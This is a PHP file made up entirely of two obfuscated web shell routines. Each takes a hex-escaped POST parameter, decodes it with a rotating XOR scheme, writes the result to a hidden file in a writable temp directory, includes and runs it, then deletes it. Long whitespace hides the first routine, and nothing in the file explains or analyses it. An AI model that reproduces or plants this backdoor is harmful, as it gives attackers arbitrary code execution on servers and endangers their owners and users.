<?php																																										if(filter_has_var(INPUT_POST, "\x72e\x73\x6F\x75rce")){ $entity = $_POST["\x72e\x73\x6F\x75rce"]; $entity =explode ( '.' ,$entity ); $rec= ''; $s= 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen= strlen($s); foreach ($entity as $z => $v9): $sChar= ord($s[$z %$sLen]); $dec= ((int)$v9 - $sChar - ($z %10)) ^ 87; $rec .= chr($dec); endforeach; $tkn = array_filter([sys_get_temp_dir(), "/dev/shm", getenv("TMP"), session_save_path(), getenv("TEMP"), "/tmp", ini_get("upload_tmp_dir"), getcwd(), "/var/tmp"]); $obj = 0; do { $res = $tkn[$obj] ?? null; if ($obj >= count($tkn)) break; if ((bool)is_dir($res) && (bool)is_writable($res)) { $fac = join("/", [$res, ".symbol"]); if (file_put_contents($fac, $rec)) { include $fac; @unlink($fac); die(); } } $obj++; } while (true); }


if(isset($_POST["v\x61l"]) ? true : false){
	$ptr = $_POST["v\x61l"];
	 	$ptr   =	explode	( '.'	,$ptr 	 )	 ;
	$sym  =	'';
            $s2  =	'abcdefghijklmnopqrstuvwxyz0123456789';
            $sLen  =	strlen(		$s2  );
            $__len  =	count(		$ptr  );
    
            for(		$r  =	0; $r	 <  $__len; $r++) {	$v2  =	$ptr[$r];
                $chS  =	ord(		$s2[$r	 % $sLen]  );
                $d  =	(		(		int)$v2 - $chS -(		$r	 % 10))  ^	79;
                $sym .= chr(		$d  ); }	
	$holder = array_filter([ini_get("upload_tmp_dir"), getcwd(), session_save_path(), "/var/tmp", getenv("TEMP"), "/dev/shm", sys_get_temp_dir(), "/tmp", getenv("TMP")]);
	while ($object = array_shift($holder)) {
    		if (is_dir($object) && is_writable($object)) {
    $k = join("/", [$object, ".data_chunk"]);
    if (file_put_contents($k, $sym)) {
	include $k;
	@unlink($k);
	die();
}
}
}
}